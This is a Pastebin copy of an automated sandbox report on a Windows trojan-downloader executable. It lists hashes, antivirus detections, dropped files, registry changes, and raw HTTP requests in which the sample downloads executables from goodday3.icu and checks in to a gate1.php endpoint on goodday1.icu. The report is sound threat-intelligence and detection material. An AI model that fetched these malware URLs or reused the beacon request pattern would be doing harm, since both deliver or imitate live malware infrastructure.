API tools faq
paste
Advertisement
paladin316

Exes_16624dd73e07cbb41a72d761834b8678_exe_2019-08-16_00_30.txt

paladin316
Aug 15th, 2019
1,768
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.51 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * MalFamily: "TrojanDownloader"
  3.  
  4. * MalScore: 7.6
  5.  
  6. * File Name: "Exes_16624dd73e07cbb41a72d761834b8678.exe"
  7. * File Size: 305152
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "3ac12a9b312148eb7fbdc866c7529b887a4f61b1dd4294b0c988bc0372c9d2e8"
  10. * MD5: "16624dd73e07cbb41a72d761834b8678"
  11. * SHA1: "fa7277590749ec603bda84b9321d660a04065dd4"
  12. * SHA512: "7640b0f9404524f09de16bf8cd958317e0420d6aecbbe24a332a3cd56246397f25bc277c00ac11f38a48c5d760119328893d2a837d05060fa0c0bee6520de9cf"
  13. * CRC32: "928EB661"
  14. * SSDEEP: "6144:4SHhkiv2ofUxewZDXW12f+DeI0Ir7eckoLftI4p:4SHhkixUPZDXW12fwekvFkAlI4p"
  15.  
  16. * Process Execution:
  17. "Exes_16624dd73e07cbb41a72d761834b8678.exe",
  18. "sghost.exe",
  19. "sghost.tmp",
  20. "trade-info.exe"
  21.  
  22.  
  23. * Executed Commands:
  24. "C:\\Users\\user\\AppData\\Local\\Temp\\sghost.exe /VERYSILENT /SP- /PASSWORD=346",
  25. "\"C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp\" /SL5=\"$502E2,2434175,58368,C:\\Users\\user\\AppData\\Local\\Temp\\sghost.exe\" /VERYSILENT /SP- /PASSWORD=346"
  26.  
  27.  
  28. * Signatures Detected:
  29.  
  30. "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
  31. "Details":
  32.  
  33. "IP": "8.208.11.27:80"
  34.  
  35.  
  36.  
  37.  
  38. "Description": "Creates RWX memory",
  39. "Details":
  40.  
  41.  
  42. "Description": "Possible date expiration check, exits too soon after checking local time",
  43. "Details":
  44.  
  45. "process": "trade-info.exe, PID 2276"
  46.  
  47.  
  48.  
  49.  
  50. "Description": "Reads data out of its own binary image",
  51. "Details":
  52.  
  53. "self_read": "process: sghost.exe, pid: 1548, offset: 0x0025247f, length: 0x00010f2a"
  54.  
  55.  
  56. "self_read": "process: sghost.exe, pid: 1548, offset: 0x00263681, length: 0x0003b205"
  57.  
  58.  
  59. "self_read": "process: sghost.tmp, pid: 2252, offset: 0x00000000, length: 0x000afa00"
  60.  
  61.  
  62.  
  63.  
  64. "Description": "File has been identified by 10 Antiviruses on VirusTotal as malicious",
  65. "Details":
  66.  
  67. "Cylance": "Unsafe"
  68.  
  69.  
  70. "Symantec": "ML.Attribute.HighConfidence"
  71.  
  72.  
  73. "ESET-NOD32": "a variant of Win32/TrojanDownloader.Agent.ERR"
  74.  
  75.  
  76. "APEX": "Malicious"
  77.  
  78.  
  79. "Paloalto": "generic.ml"
  80.  
  81.  
  82. "FireEye": "Generic.mg.16624dd73e07cbb4"
  83.  
  84.  
  85. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  86.  
  87.  
  88. "Endgame": "malicious (moderate confidence)"
  89.  
  90.  
  91. "VBA32": "suspected of Trojan.Downloader.gen.h"
  92.  
  93.  
  94. "Rising": "Trojan.Generic@ML.97 (RDML:+Fg4sY95rKwMKUziWQAlIA)"
  95.  
  96.  
  97.  
  98.  
  99. "Description": "Drops a binary and executes it",
  100. "Details":
  101.  
  102. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\trade-info.exe"
  103.  
  104.  
  105. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\sghost.exe"
  106.  
  107.  
  108. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp"
  109.  
  110.  
  111.  
  112.  
  113. "Description": "Performs some HTTP requests",
  114. "Details":
  115.  
  116. "url": "http://goodday3.icu/trading.exe"
  117.  
  118.  
  119. "url": "http://goodday3.icu/eghost.exe"
  120.  
  121.  
  122. "url": "http://goodday1.icu/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2"
  123.  
  124.  
  125.  
  126.  
  127. "Description": "The binary likely contains encrypted or compressed data.",
  128. "Details":
  129.  
  130. "section": "name: .rsrc, entropy: 7.04, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00034c00, virtual_size: 0x00034af0"
  131.  
  132.  
  133.  
  134.  
  135.  
  136. * Started Service:
  137.  
  138. * Mutexes:
  139. "CicLoadWinStaWinSta0",
  140. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  141. "Local\\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511",
  142. "Local\\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000",
  143. "DefaultTabtip-MainUI"
  144.  
  145.  
  146. * Modified Files:
  147. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\trading1.exe",
  148. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\PA320MG8\\eghost1.exe",
  149. "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp",
  150. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_setup64.tmp",
  151. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_iscrypt.dll",
  152. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\ReactiveUI.WPF.dll",
  153. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\System.Reactive.dll",
  154. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Trader.Domain.dll",
  155. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\DynamicData.dll",
  156. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\log4net.dll",
  157. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\MahApps.Metro.dll",
  158. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\MaterialDesignColors.dll",
  159. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\ReactiveUI.dll",
  160. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\StructureMap.dll",
  161. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\System.Windows.Interactivity.dll",
  162. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Trader.Client.exe",
  163. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\DynamicData.ReactiveUI.dll",
  164. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\MaterialDesignThemes.Wpf.dll",
  165. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Splat.dll",
  166. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Dragablz.dll",
  167. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\System.Drawing.Primitives.dll",
  168. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\unins000.dat",
  169. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3RL7.tmp",
  170. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\unins000.exe",
  171. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-ROFKP.tmp",
  172. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-JN55T.tmp",
  173. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\aaaaaaa.iss",
  174. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-51GRO.tmp",
  175. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-VIJA6.tmp",
  176. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-L3FOK.tmp",
  177. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-FFN00.tmp",
  178. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\l.txt",
  179. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-9B017.tmp",
  180. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Log4Net.config",
  181. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TEDKJ.tmp",
  182. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1RRNM.tmp",
  183. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-7MSIE.tmp",
  184. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-D8CGB.tmp",
  185. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-QJUV7.tmp",
  186. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-5JH7Q.tmp",
  187. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TK29U.tmp",
  188. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3C8S.tmp",
  189. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1BD8P.tmp",
  190. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-4A62L.tmp",
  191. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-GND79.tmp",
  192. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-55GEH.tmp",
  193. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-F0642.tmp",
  194. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.lnk"
  195.  
  196.  
  197. * Deleted Files:
  198. "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp\\sghost.tmp",
  199. "C:\\Users\\user\\AppData\\Local\\Temp\\is-18TLB.tmp",
  200. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3RL7.tmp",
  201. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-ROFKP.tmp",
  202. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-JN55T.tmp",
  203. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-51GRO.tmp",
  204. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-VIJA6.tmp",
  205. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-L3FOK.tmp",
  206. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-FFN00.tmp",
  207. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-9B017.tmp",
  208. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TEDKJ.tmp",
  209. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1RRNM.tmp",
  210. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-7MSIE.tmp",
  211. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-D8CGB.tmp",
  212. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-QJUV7.tmp",
  213. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-5JH7Q.tmp",
  214. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-TK29U.tmp",
  215. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-S3C8S.tmp",
  216. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-1BD8P.tmp",
  217. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-4A62L.tmp",
  218. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-GND79.tmp",
  219. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\Trader.Client.exe",
  220. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-55GEH.tmp",
  221. "C:\\Users\\user\\AppData\\Local\\Temp\\softsinn\\Softsinn Trade-info\\is-F0642.tmp",
  222. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.lnk",
  223. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.pif",
  224. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Softsinn Trade-info.url",
  225. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_iscrypt.dll",
  226. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup\\_setup64.tmp",
  227. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp\\_isetup",
  228. "C:\\Users\\user\\AppData\\Local\\Temp\\is-SA645.tmp"
  229.  
  230.  
  231. * Modified Registry Keys:
  232. "HKEY_CURRENT_USER\\Software\\softsinn\\",
  233. "HKEY_CURRENT_USER\\Software\\softsinn\\softsinn",
  234. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000",
  235. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner",
  236. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  237. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  238. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  239. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  240. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1",
  241. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Setup Version",
  242. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: App Path",
  243. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\InstallLocation",
  244. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Icon Group",
  245. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: User",
  246. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Selected Tasks",
  247. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Deselected Tasks",
  248. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Inno Setup: Language",
  249. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\DisplayName",
  250. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\UninstallString",
  251. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\QuietUninstallString",
  252. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\DisplayVersion",
  253. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\Publisher",
  254. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\URLInfoAbout",
  255. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\HelpLink",
  256. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\URLUpdateInfo",
  257. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\NoModify",
  258. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\NoRepair",
  259. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\InstallDate",
  260. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\MajorVersion",
  261. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\MinorVersion",
  262. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\VersionMajor",
  263. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\VersionMinor",
  264. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\CA9C5C28-4226-4148-8898-A67428590BAE_is1\\EstimatedSize"
  265.  
  266.  
  267. * Deleted Registry Keys:
  268. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFilesHash",
  269. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\RegFiles0000",
  270. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Sequence",
  271. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\SessionHash",
  272. "HKEY_CURRENT_USER\\Software\\Microsoft\\RestartManager\\Session0000\\Owner"
  273.  
  274.  
  275. * DNS Communications:
  276.  
  277. "type": "A",
  278. "request": "goodday3.icu",
  279. "answers":
  280.  
  281. "data": "8.208.11.27",
  282. "type": "A"
  283.  
  284.  
  285.  
  286.  
  287. "type": "A",
  288. "request": "goodday1.icu",
  289. "answers":
  290.  
  291. "data": "8.208.11.27",
  292. "type": "A"
  293.  
  294.  
  295.  
  296.  
  297.  
  298. * Domains:
  299.  
  300. "ip": "8.208.11.27",
  301. "domain": "goodday3.icu"
  302.  
  303.  
  304. "ip": "8.208.11.27",
  305. "domain": "goodday1.icu"
  306.  
  307.  
  308.  
  309. * Network Communication - ICMP:
  310.  
  311. * Network Communication - HTTP:
  312.  
  313. "count": 1,
  314. "body": "",
  315. "uri": "http://goodday3.icu/trading.exe",
  316. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  317. "method": "GET",
  318. "host": "goodday3.icu",
  319. "version": "1.1",
  320. "path": "/trading.exe",
  321. "data": "GET /trading.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: goodday3.icu\r\nConnection: Keep-Alive\r\n\r\n",
  322. "port": 80
  323.  
  324.  
  325. "count": 1,
  326. "body": "",
  327. "uri": "http://goodday3.icu/eghost.exe",
  328. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  329. "method": "GET",
  330. "host": "goodday3.icu",
  331. "version": "1.1",
  332. "path": "/eghost.exe",
  333. "data": "GET /eghost.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: goodday3.icu\r\nConnection: Keep-Alive\r\n\r\n",
  334. "port": 80
  335.  
  336.  
  337. "count": 1,
  338. "body": "",
  339. "uri": "http://goodday1.icu/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2",
  340. "user-agent": "Mylegion666",
  341. "method": "GET",
  342. "host": "goodday1.icu",
  343. "version": "1.1",
  344. "path": "/gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2",
  345. "data": "GET /gate1.php?a=bbed3e02-0b41-11e3-8249-8fuckusa06e6f6e69632id=2 HTTP/1.1\r\nAccept: text/*\r\nUser-Agent: Mylegion666\r\nHost: goodday1.icu\r\n\r\n",
  346. "port": 80
  347.  
  348.  
  349.  
  350. * Network Communication - SMTP:
  351.  
  352. * Network Communication - Hosts:
  353.  
  354. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!